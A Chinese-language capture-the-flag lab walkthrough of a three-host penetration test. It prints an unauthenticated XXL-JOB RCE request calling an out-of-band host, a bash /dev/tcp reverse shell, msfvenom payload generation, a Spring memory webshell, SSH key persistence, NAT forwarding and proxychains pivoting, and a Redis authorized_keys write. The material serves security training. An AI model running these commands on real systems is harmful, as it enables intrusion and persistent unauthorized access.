本篇是老东家的某个月同事出的靶场渗透测试,都是常规操作,拿来练手提升基础熟练度非常合适
目录扫描发现:
访问发现报错信息:
根据java的包的报错,可以找到源代码,这里我问了chatgpt:
谷歌找到文档,翻到后台:
http://192.168.10.70:8080/xxl-job-admin/toLogin
经过翻阅,发现有一个未授权的RCE,最新的那个SSRF进后台RCR的那个没搞出来,这个是老的:
POST /run HTTP/1.1
Host: 192.168.10.70:9999
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 521
{
"jobId":1,
"executorHandler":"demoJobHandler",
"executorParams":"demoJobHandler",
"executorBlockStrategy":"COVER_EARLY",
"executorTimeout":0,
"logId":1,
"logDateTime":1586629003729,
"glueType":"GLUE_SHELL",
"glueSource":"ping ecujz4ok5rcfvx3kdd5turf0rrxil89x.oastify.com",
"glueUpdatetime":1586629003727,
"broadcastIndex":0,
"broadcastTotal":0
}
dns成功触发了:
接下来就是反弹shell,
/bin/bash -i >& /dev/tcp/192.168.11.108/8888 0>&1
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.11.108 LPORT=443 -f elf -o reverse.elf
为了维持住会话,上一下msf:
找到了第一个flag flag{xxl_job_admin_2.2.0_RCE}
上传扫描工具,发现新的ip 192.168.50.5和springboot rce漏洞:
一顿操作搭建frp代理:
权限维持一下:
验证能不能使用:
set key_path /root/.msf4/loot/
set username root
set rhosts 192.168.10.70
使用ssh_logion_pubkey可以直接反弹一个shell回来:
https://www.infosecmatter.com/metasploit-module-library/?mm=post/linux/manage/sshkey_persistence
第二台利用spingcould拿下,http://192.168.50.5:8800/
打入内存木马,http://192.168.50.5:8800/?cmd=ifconfig 是SpringRequestMappingMemshell,/?cmd={cmd} 执行命令ifconfig:
找到了第二个靶机的flag,flag{慢就是快}
添加端口转发
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp --dport 7088 -j DNAT --to-destination 192.168.10.75:8000
iptables -t nat -A POSTROUTING -p tcp -d 192.168.10.75 --dport 8000 -j SNAT --to-source 192.168.10.70
iptables -t nat -L
192.168.10.75是我们的vps,8000是vps监听的端口,–to-source 192.168.10.70是本机的网卡,这张网卡的地址应该要能连接我们的vps
一顿操作,生成木马,下载执行又上线了:
上传扫描一波:发现新的服务,为192.168.80.8:6379的redis服务:
记录一下msf如何添加代理,首先要使用socks模块运行,这里不需要太多改动:
server/socks_proxy
之后是要在meteperter里面去
run autoroute -s 192.168.80.0/24
检测一下代理到底通不通:
proxychains nmap -p 6379 -Pn -v 192.168.80.8 -sT
根据提示,去nacos添加用户,查看配置文件:
登录用户查看配置文件,密码是redis@c123
利用公钥登录:
ssh-keygen -t rsa
cd /root/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt
cat 1.txt | proxychains redis-cli -h 192.168.80.8 -a "nbsg@123456" -x set crack
proxychains redis-cli -h 192.168.80.8 -a "nbsg@123456"
CONFIG GET dir
config set dir /root/.ssh
CONFIG SET dbfilename authorized_keys
CONFIG GET dbfilename
save
成功认证:
proxychains ssh -i id_rsa [email protected]
拿到最后一个flag,结束了这次的考核: